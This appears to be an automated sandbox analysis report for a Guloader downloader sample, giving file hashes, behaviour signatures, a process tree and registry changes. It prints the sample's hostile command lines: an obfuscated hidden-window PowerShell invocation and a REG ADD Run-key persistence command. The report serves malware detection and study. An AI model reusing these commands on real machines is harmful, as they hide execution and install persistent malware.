Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
10-07-2024 01:58
Static task
static1
Behavioral task
behavioral1
Sample
9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe
Resource
win10v2004-20240709-en
General
-
Target
9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe
-
Size
387KB
-
MD5
06e45d2db3c52517fc7139b3b32a4742
-
SHA1
602ab4e85c1506af02d51e144298bac3aea331ca
-
SHA256
9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f
-
SHA512
32e1131c14136721d872ea13736fe7041d8d7e09a1efac363a4bc1d29a9bcd4fcfc8e523cf689386a7e8fe67100194211a1ea9934f7fde5f241df77adcdb61bd
-
SSDEEP
12288:3GqS6hqE06uAyNOcSN6dJjfJ1mPaxm5Bj3O9X:3GqS6hb0Kd4FBcixmBje9
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\\Ufrugtbarhedens\\').quadricapsular;%Grshoppens% ($nedstemmes)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 2924 wab.exe 2924 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 1992 powershell.exe 2924 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1992 set thread context of 2924 1992 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepid process 1992 powershell.exe 1992 powershell.exe 1992 powershell.exe 1992 powershell.exe 1992 powershell.exe 1992 powershell.exe 1992 powershell.exe 1992 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 1992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1992 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exepowershell.exewab.execmd.exedescription pid process target process PID 2692 wrote to memory of 1992 2692 9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe powershell.exe PID 2692 wrote to memory of 1992 2692 9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe powershell.exe PID 2692 wrote to memory of 1992 2692 9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe powershell.exe PID 2692 wrote to memory of 1992 2692 9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe powershell.exe PID 1992 wrote to memory of 2924 1992 powershell.exe wab.exe PID 1992 wrote to memory of 2924 1992 powershell.exe wab.exe PID 1992 wrote to memory of 2924 1992 powershell.exe wab.exe PID 1992 wrote to memory of 2924 1992 powershell.exe wab.exe PID 1992 wrote to memory of 2924 1992 powershell.exe wab.exe PID 1992 wrote to memory of 2924 1992 powershell.exe wab.exe PID 2924 wrote to memory of 2776 2924 wab.exe cmd.exe PID 2924 wrote to memory of 2776 2924 wab.exe cmd.exe PID 2924 wrote to memory of 2776 2924 wab.exe cmd.exe PID 2924 wrote to memory of 2776 2924 wab.exe cmd.exe PID 2776 wrote to memory of 1724 2776 cmd.exe reg.exe PID 2776 wrote to memory of 1724 2776 cmd.exe reg.exe PID 2776 wrote to memory of 1724 2776 cmd.exe reg.exe PID 2776 wrote to memory of 1724 2776 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe"C:\Users\Admin\AppData\Local\Temp\9500e0c5048bf63eeb3dee4c704ebd0f7ddc24902be50a9ef1dd0c0148546e0f.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Metabolizable=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Emptyhanded.Sla139';$Kumpan=$Metabolizable.SubString(7195,3);.$Kumpan($Metabolizable)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\Ufrugtbarhedens\').quadricapsular;%Grshoppens% ($nedstemmes)"4⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Grshoppens% -windowstyle minimized $nedstemmes=(Get-ItemProperty -Path 'HKCU:\Ufrugtbarhedens\').quadricapsular;%Grshoppens% ($nedstemmes)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:1724
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65KB
MD567cb075314762a89035c6b2b15c68f00
SHA1382134aa018f620cdfbab89a67ae7c10b22e8547
SHA256a853d35e1301ceef0526d96852cf8ed766c3d9f04bc5a7b49522b02d1b4302ea
SHA5125677a3b68f751f9cb252d45aa35f4609fe0f81c734b3ed44ddb2acd8e017c371027841892f61a7aa71debe950b2b7ea05ecdbfe577130c69a8d74c74cbaf4190
-
Filesize
325KB
MD5b9207704502bf9bc8956ea19f761c559
SHA1dee462bb9bff33881c21ce2f8615a222cbb28aa2
SHA256ea7565fe3b1b2fa90145b41406c2b175846785ba1be2d0248030dedbdd4aec6f
SHA512cba66f601051aaee865574f94996c480873017195c122d750f7355a777359ec0ba05b5f786c88753c7e3b87a01daeae82edba1d3a799e09e28f7ef8bc1f6d704